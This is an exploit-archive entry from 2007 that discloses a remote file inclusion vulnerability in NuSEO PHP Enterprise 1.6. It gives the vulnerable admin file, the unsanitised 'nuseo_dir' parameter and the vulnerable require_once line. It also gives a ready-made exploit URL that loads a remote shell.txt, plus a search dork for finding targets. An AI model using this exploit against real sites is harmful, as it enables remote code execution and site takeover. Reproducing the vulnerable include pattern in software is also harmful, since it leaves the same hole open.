[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability
# Published : 2007-10-10
# Author : BiNgZa
# Previous Title : cpDynaLinks 1.02 category.php Remote SQL Injection Exploit
# Next Title : Php-Stats 0.1.9.2 Multiple Vulnerabilities Exploit
Vulnerability Type: Remote File Inclusion
Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php
Exploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuseo_dir
Line number: 268
Lines:
----------------------------------------------
require_once( $nuseo_dir . '/nuseo' . '_d.php' );
//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );
----------------------------------------------
GrEeTs To sHaDoW sEcUrItY TeAm & str0ke
FoUnD By BiNgZa
DoRk'SEO by NuSEO.PHP'
shadowcrew@hotmail.co.uk
shadow.php0h.com
# www.Syue.com [2007-10-10]